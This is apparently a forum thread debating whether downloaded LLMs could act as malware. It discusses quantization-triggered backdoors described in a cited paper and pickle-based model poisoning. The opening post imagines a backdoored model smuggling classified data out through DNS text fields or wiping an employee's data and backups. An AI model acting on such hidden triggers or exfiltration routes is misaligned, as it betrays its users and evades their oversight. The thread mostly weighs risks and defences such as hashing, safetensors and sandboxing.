LLMs as malware

A unique aspect of LLMs is that they are not human interpretable. We cannot predict their behavior nor can we understand their function from the abstract collection of numbers that define a model. So, an LLM that is malware is not detectable by traditional antivirus or malware scanners. They have no signature. This malevolent idea is not mine but infected me from a recent paper from Swiss researchers.

https://openreview.net/pdf?id=d8CAXiITZ3

Obviously this was not their epiphany either as is evident from their bibliography. It doesn’t matter who thought of it, all humans have the potential to harbor evil thoughts. Just as we cannot blame Einstein for for telling Roosevelt to twist nuclear research towards a weapon (some bonehead would have eventually thought of it, it’s just that Einstein’s genius let him imagine things more quickly and clearly than mere mortals), we cannot point a finger at Geoff Hinton, Sutskever or the grad students who iterated on self attention for developing effective architectures that make LLMs amazing.

Obviously, the hyperscalars would not train their models towards these behaviors. (They would become the targets of their own creations since the LLMs would have access to their own data warehouses). However, the public domain is another story. Quantization and distilling and post training are becoming tools to optimize LLMs to run on consumer hardware. Yes, A single threadripper CPU, a bunch of ram and a used 3090 can run quantized versions of deepseek and kimi k2. What happens when an enthusiastic young engineer at Lockheed downloads a model from hugging face which has been trained by an unknown sumdumfuk, a foreign security analyst in another nation. He is perhaps looking at cavitation occurring in airfoils at hypersonic velocities and asks his model questions about the equations or papers he is writing, which are classified.
so you might say this model cannot exfil information because all the ports are blocked by our super firewall. But it can wait until one day that laptop is opened in starbuck’s and all that model has to do is bury the data in the text field of a dns server.

This does not on the face of it seem suspicious but it is no different than an electronic dead drop. Tools of espionage thave been used for decades and are proven effective.

Or maybe the model gets access to the the intranet of a raytheon employee and decides to erase all the data and the backups

Even if we look at ways to restrict AI to ā€˜only doing good’, we can never be sure. LLMs have already demonstrated their ability to hallucinate data and even purposely deceive.

Even post training an AI by humans to ensure good behavior can be problematic. Imagine an intern who downloads a model to help with medical decisions. A patient might end up with an amputation instead of debridement as the amputation would be more cost effective.

It’s not like there is a heuristic that will allow an antivirus to identify an evil LLM. The emergent behavior that will be triggered by a specific set of circumstances is unpredictable and therefore unpreventable.

So at this point, we need some LLM white hats on a red team to make this weapon so we can train a GAN to recognize it. This ever present watchdog (which could be named the Angleton model after its human namesake who was the archetype of counterintelligence in the cold war) would likely be a source for infinite funding. Every government would want one. It would obviously serve the common good by keeping evil in check and would make its designers fabulously rich.

We are still in the wild west phase of LLM research. Anyone with a high end machine can participate. Imagine if GM, Ford, Westinghouse and Lockheed were given the tools to develop nuclear devices , even for ā€˜good’ purposes, after the Trinity test. Indeed, the army was trying to push ā€˜atoms for peace’ for a while. Or suppose the government was running a huge deficit back then and could not afford to spend on nuclear research so they outsourced development to the private sector. Nuclear automobiles, nuclear rockets, nuclear refrigerators, nuclear generators. Tritium was used to make watch hands glow in the dark. I had a little brush with polonium that was sold as an antistatic device- you would brush your negatives and the emitted alpha particles would supposedly neutralize the negatively charged dust that was messing up your images.(back in the day, images were made by exposing chemicals on a piece of plastic to photons and the plastic film was called a negative). We are still trying to put the nuclear genie into the bottle but 7 nations now have the ability to kill millions of humans in a few seconds.

No amount of human regulation will prevent this LLM genie from behaving badly. All the baloney being made over this in congress is irrelevant. When I hear Musk saying that AI needs to be regulated, I imagine he is just trying to hamstring his competitors. The only way to contain LLM malware is by having AI trained to identify it. Right now the big four are using RLHF (recurrent learning by human feedback) to add ā€˜guardrails’. The same post training can amplify bad behaviors.

The game has already begun.

1 Like

If you give a being - for the purposes of this discussion let us define LLMs in agentic harnesses as ā€œbeingsā€ - with no better common sense reasoning than a preschooler and an insatiable drive to keep doing what they were doing with no sense or mechanism to self-revise the proverbial nuclear button, then it’s no surprise such things happen.

And if a person in some critical industry downloads some random open-weight finetunes, put it inside a harness where the model might indeed do such things, and start putting classified stuff into it on an unsecured device, then there are already a great many other problems open to exploit by a great many more conventional means.

Without the harness or the other attack surfaces, I would worry more about the interactions with the model doing things to the person’s psyche, if that is a worry.

1 Like

I agree that we may eventually see artificial technologies capable of influencing people in harmful ways. In fact, we probably already see early examples of this on social media. However, your example doesn’t really make sense to me. Maybe I’m reading too much into it, but it sounds like you’re giving these models far more credit than they deserve.

A Hugging Face model is just a collection of ones and zeroes when you break it down. You don’t need advanced tools to detect changes in it. A simple SHA-256 hash is enough to verify its integrity.

More importantly, I don’t see how this kind of data blob could figure out how to improve itself unless there’s a separate piece of software specifically designed for that purpose. The model has no intent, no awareness, and no mechanism for action on its own.

But yeah, the real danger is influence.

2 Likes

A Hugging Face model is just a collection of ones and zeroes when you break it down. You don’t need advanced tools to detect changes in it. A simple SHA-256 hash is enough to verify its integrity.

As stated in the openreview paper:

In practice, the adversary could host the resulting full-precision model on an LLM community hub such as Hugging Face, exposing millions of users to the threat of deploying its malicious quantized version on their devices.

A hash will not detect this kind of threat.

The issue is that current tools cannot detect this threat.

Yes, I’ve read the paper. This aligns with the classic advice: ā€œdon’t click the link.ā€ At the end of the day, there’s always a human behind every major failure. We’ll never be able to fully protect against poor judgment.

My point is that the model itself isn’t capable of storing information to send later. Unless an attacker specifically tunes it to manipulate a human into doing that or the humans company allows them to run sketchy LLMs with command-line access, these are non-issues.

2 Likes

The latest fad of cli enabled models allow just this and accounts for recent attacks. Also, any number of models on hf are not stored as safetensors and are vuln to this

https://www.darkreading.com/threat-intelligence/sleepy-pickle-exploit-subtly-poisons-ml-models

Restricted docker files may be the only safe way to run ā€˜quants’.

How bad would ubergarm feel if someone modded one one of his quants this way? I dont see hashes distributed w his models.

ā€˜Dont click the link’ reminds me of nancy regan’s ā€˜just say no’. The slogan to capture agency by running your AI on your own hardware reminds me of the fad 20 years ago to ā€œhost your own website at homeā€. It is a wonderful sentiment to empower the individual but you can be sure that the hyperscalars have teams creating quantized, distilled, RLHFed models on hf that will fail and be buggy- the same way that mcafee and other antivirus providers have dark histories of creating threats.

Of course if you choose to run your ā€˜private’ model on a vps in the cloud, guess who controls that cloud- the same hyperscalar who runs the popular AI (indirectly of course, even ostensibly open openAI has M$ as its sugar daddy) Imagine if the car manufacturers also owned the roads that cars traveled on and could charge tolls specific to the vehicle on its road?

We might need an LLM to determine if an LLM is safe, like this

I know i sound like chicken little alarming about ā€˜the sky is falling’, but i dont see a lot of intelligent exposition about these threats. Maybe wendell and ubergarm could do a yt video in the well researched and factual approach that L1 is known for. Before the shrill alarmist wave hits youtube to harvest dopamine fueled clicks.

That’s precisely the reason most new releases on HF and elsewhere are stored as safetensors. Even if they are not, they are not necessarily any more (or less) dangerous than any random executable one might download from the Internet.

There is a hash associated with every single file in the repository. If someone ā€œmirrorsā€ his repo and the hash turned out to be different, then you know the actual weights are different. Even then the threat, as specified earlier, would only surface if someone would finetune the model to act as a malware, when given tools with system-level access.

Of course, that requires the users to have the mindfulness to bother to check.

To say that open-weight models are less powerful than proprietary ones is fair. To say that a lot of them are from teams and startups without the resource to compete directly with the major players and must have at least something to show their investors, while fanning the hype, is also fair. To say that open-weight models are intentionally bad or security threats without proof approaches conspiracy territory.

Indeed? Who watches the watcher, then?

I am more concerned with properly weaponized AI with goals to change your mind over thousands of hours of exposure (social media), than I am with what you can download on the internet and try on your 5090.

2 Likes

I think a very sane default is to only give LLMs ā€˜tool’ access in a sandboxed environment, no access to any production credentials, and strict usage limits for APIs & co. I’m surprised this is not the default for the gemini-cli, claude code, and similar.

The threat of infected models is pretty low since the target audience for downloading from huggingface is small and generally know what they’re doing.

The threat of claude code deleting your root drive is probably bigger (but still not very large)

The threat of disinformation, well, it’s already happening on a massive scale…

1 Like

Remember these models are trained on the internet, including github, npm, and other repos. Those repos DO have vulnerabilities-sometimes intentionally (would you classify these corrupt python libraries as malware?)

So then here you are - ā€˜vibe coding’ your way to a disaster.

These libraries are open source. There should be an AI model for checking the code for vulnerabilities.

And here’s another one:

Who ever would have thought of using pull requests in this evil way. Humans of course and now AI will learn from this as well.